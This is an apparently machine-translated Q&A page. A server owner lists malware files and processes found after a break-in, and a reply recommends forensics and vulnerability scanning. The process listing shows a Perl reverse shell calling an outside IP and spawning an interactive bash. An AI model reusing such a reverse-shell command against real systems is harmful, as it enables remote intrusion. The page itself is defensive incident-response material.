Como encontrar vulnerabilidades em serviços do Ubuntu? [fechadas]

Navegue suas respostas
1

Eu tenho um servidor Ubuntu executando. Hoje descobri que o servidor foi invadido e está sendo usado para DDoS por meio do relatório de abuso da Amazon.

Eu encontrei as seguintes coisas no servidor.

Os seguintes arquivos suspensos onde estão no servidor. 

-rw-r--r-- 1 www-data www-data      759 Dec 21 15:38 weiwei.pl
-rwxrwxrwx 1 www-data www-data  1223123 Dec 26 02:20 huizhen
-rwxr-xr-x 1 www-data www-data        5 Jan 26 14:21 gates.lod
-rwxrwxrwx 1 www-data www-data  1135000 Jan 27 14:09 sishen
-rw-r--r-- 1 www-data www-data      759 Jan 27 14:36 weiwei.pl.5
-rw-r--r-- 1 www-data www-data      759 Jan 27 14:36 weiwei.pl.4
-rw-r--r-- 1 www-data www-data      759 Jan 27 14:36 weiwei.pl.3
-rw-r--r-- 1 www-data www-data      759 Jan 27 14:36 weiwei.pl.2
-rw-r--r-- 1 www-data www-data      759 Jan 27 14:36 weiwei.pl.1
-rwxr-xr-x 1 www-data www-data        5 Jan 28 14:00 vga.conf
-rw-r--r-- 1 www-data www-data      119 Jan 29 06:22 cmd.n
-rw-r--r-- 1 www-data www-data       73 Feb  1 01:01 conf.n

O processo a seguir foi executado 

www-data  8292 10629  0 Jan28 ?        00:00:00 perl /tmp/weiwei.pl 222.186.42.207 5222
www-data  8293  8292  0 Jan28 ?        00:00:00 /bin/bash -i
www-data  8293  8292  0 Jan28 ?        00:00:00 ./huizhen

Eu corri clamav e excluí os arquivos /tmp/huizhen e /tmp/sishen , mas os processos ainda estavam executando weiwei.pl e ./huizhen , então eu os matei manualmente.

Eu tenho os seguintes serviços em execução no servidor.

  • SSH - Não está usando a porta padrão 22, somente a autenticação principal
  • MongoDB - A porta está aberta para um grupo de segurança específico
  • Memcache - A porta está aberta para um grupo de segurança específico
  • NodeJS - A porta está aberta para um grupo de segurança específico
  • As portas do Tomcat - 8080/8443 são públicas para webservice e solr de axis2

Minha suposição é que o hacker entrou em alguma vulnerabilidade de tomcat / axis2 / solr porque o processo está em execução usando o mesmo grupo de usuários que o tomcat.

Por enquanto, bloqueiei as portas 8080/8443 e substituirei o servidor por um novo. O Tomcat estará acessível de um servidor diferente por meio do nginx. Eu também instalei patches de segurança usando atualizações autônomas .

O problema é como descobrir como o hacker entrou e plantou os trojans. Que outras medidas posso tomar para aumentar a segurança?

    
por bitkot 01.02.2016 / 15:33

1 resposta

1

Esta é uma questão bastante razoável. Estritamente falando, sua melhor aposta para responder teria sido congelar seu sistema e realizar testes forenses. Qualquer intervenção posterior da sua parte, incluindo remoção de vírus, irá alterar e possivelmente apagar completamente qualquer migalha deixada pelo seu intruso.

Considerando que esse caminho não está mais aberto a você, o melhor é usar um verificador de vulnerabilidades, um programa ou seja, projetado exatamente para testar a sua instalação com ênfase. Há muito, você pode apenas Google o termo Vulnerability Scanner , mas de longe o mais conhecido é Nessus . Ele vem em várias versões, do livre ao pago com licenças diferentes, e pode se tornar muito caro, possivelmente mais do que você está disposto a desembolsar.

No entanto, há também uma versão gratuita, que vem pré-instalada no Kali Linux . Você terá que registrá-lo, mesmo que seja completamente gratuito. Muitos de nós usamos o Kali instalando-o em uma VM em um laptop, e depois realizando os testes de estresse fora de nossas casas, para ver quais defeitos (= vulnerabilidades não-corrigidas e conhecidas, na maioria das vezes) são deixados nos aplicativos em execução em um laptop. Servidor voltado para a Internet.

Existem guias ensinando como usar isso em toda a Internet, e você pode experimentá-lo também dentro de sua própria LAN (se confiar no seu firewall), e até mesmo dentro do mesmo computador, se você estiver executando o Kali como uma VM.

    
por 01.02.2016 / 18:55

Tags

O serviço BITS não está iniciando, o Windows Update sempre fica preso em 0% Como funciona o endereçamento de byte?